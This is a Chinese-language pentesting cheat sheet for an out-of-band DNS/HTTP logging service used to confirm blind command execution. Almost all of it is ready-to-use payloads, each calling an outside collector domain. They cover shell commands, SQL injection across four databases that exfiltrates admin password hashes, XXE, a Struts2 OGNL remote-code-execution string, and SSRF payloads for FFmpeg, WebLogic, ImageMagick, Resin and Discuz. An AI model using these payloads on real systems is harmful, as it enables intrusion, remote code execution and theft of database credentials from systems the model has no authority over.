云眼Url: http://eye.jozxing.cc
主要功能,用来处理在渗透测试过程中,找到了服务器命令执行漏洞,但是无法回显结果或者检验执行是否成功,于是乎云眼出现了,利用服务器请求域名时需要查询DNS的过程,来获取结果。至于环境搭建,需要两个域名一个公网服务器,A域名做NS服务器,B域名用来获取DNS记录查看,且B域名的DNS设置为A域名(即NS)。云眼可用于 *nix,多种数据库,windows,具体利用方式如下,
1. *nix:
curl http://eye.0x80.cc/`whoami`
ping `whoami`.eye.0x80.cc
2. windows
ping %USERNAME%.b182oj.ceye.io
0x01 SQL Injection
From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.
3. SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name=’sa’)
+’.eye.0x80.cc’;
EXEC(‘master..xp_dirtree
“\\’+@host+’\foobar$”‘);
4. Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS(‘eye.0x80.cc’);
SELECT UTL_HTTP.REQUEST(‘http://eye.0x80.cc/oracle’) FROM DUAL;
SELECT HTTPURITYPE(‘http://eye.0x80.cc/oracle’).GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT((‘oracle.eye.0x80.cc’,80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name=’SYS’)||’.eye.0x80.cc’,80) FROM DUAL;
5. MySQL
SELECT LOAD_FILE(CONCAT(‘\\\\’,(SELECT password FROM mysql.user WHERE user=’root’ LIMIT 1),’.mysql.eye.0x80.cc\\abc’));
6. PostgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename=’postgres’);
exec_cmd := E’COPY table_output(content)
FROM E\’\\\\\\\\’||query_result||E’.psql.eye.0x80.cc\\\\foobar.txt\”;
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();
7. XML Entity Injection
<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM “http://eye.0x80.cc/xxe_test”>
%remote;]>
<root/>
8. Struts2
xx.action?redirect:http://eye.0x80.cc/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘whoami’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d”http://eye.0x80.cc/result%3d”.concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod(“GET”),%23http.connect(),%23http.getInputStream()}
9. FFMpeg
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://eye.0x80.cc
#EXT-X-ENDLIST
10. Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://eye.0x80.cc/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
11. ImageMagick
push graphic-context
viewbox 0 0 640 480
fill ‘url(http://eye.0x80.cc)’
pop graphic-context
v. Resinxxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://eye.0x80.cc/ssrf
12. Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://eye.0x80.cc/xx.jpg[/img]&formhash=xxoo